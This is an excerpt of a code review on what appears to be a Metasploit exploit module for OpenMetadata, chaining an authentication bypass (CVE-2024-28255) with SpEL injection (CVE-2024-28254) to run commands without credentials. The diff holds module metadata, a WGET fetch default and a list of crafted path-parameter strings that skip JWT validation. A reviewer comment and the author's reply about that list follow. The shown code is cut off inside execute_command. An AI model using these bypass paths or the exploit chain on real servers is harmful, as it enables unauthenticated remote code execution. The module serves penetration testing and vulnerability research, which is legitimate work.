modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb

```diff
@@ -0,0 +1,134 @@
+          endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters
+          to make any path contain any arbitrary strings that will match the excluded endpoint condition
+          and therefore will be processed with no JWT validation allowing an attacker to bypass the
+          authentication mechanism and reach any arbitrary endpoint.
+          By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection
+          at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers
+          are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any
+          authentication.
+          OpenMetadata versions `1.2.3` and below are vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Msf module contributor
+          'Alvaro Muñoz alias pwntester (https://github.com/pwntester)' # Original discovery
+        ],
+        'References' => [
+          ['CVE', '2024-28255'],
+          ['CVE', '2024-28254'],
+          ['URL', 'https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/'],
+          ['URL', 'https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255'],
+          ['URL', 'https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/']
+        ],
+        'DisclosureDate' => '2024-03-15',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Automatic',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'rport' => 8585,
+          'FETCH_COMMAND' => 'WGET'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path of the OpenMetadata web application', '/'])
+      ]
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    # list of paths that require no authentication
+    paths_to_skip = [
+      '/api/v1;v1%2Fv1%2Fusers%2Flogin',
+      '/api/v1;v1%2Fv1%2Fusers%2Fsignup',
+      '/api/v1;v1%2Fv1%2Fusers%2FregistrationConfirmation',
+      '/api/v1;v1%2Fv1%2Fusers%2FresendRegistrationToken',
+      '/api/v1;v1%2Fv1%2Fusers%2FgeneratePasswordResetLink',
+      '/api/v1;v1%2Fv1%2Fusers%2Fpassword%2Freset',
+      '/api/v1;v1%2Fv1%2Fusers%2FcheckEmailInUse',
+      '/api/v1;v1%2Fv1%2Fusers%2Frefresh',
+      '/api/v1;v1%2Fv1%2Fsystem%2Fconfig',
+      '/api/v1;v1%2Fv1%2Fsystem%2Fversion'
+    ]
```

Comment:
Would the user ever want to configure this list with a datastore option, or is this the finite list for this software? 👀

Reply:
The latter. It is a fixed list embedded in the code . See [my article](https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255) on attackerkb.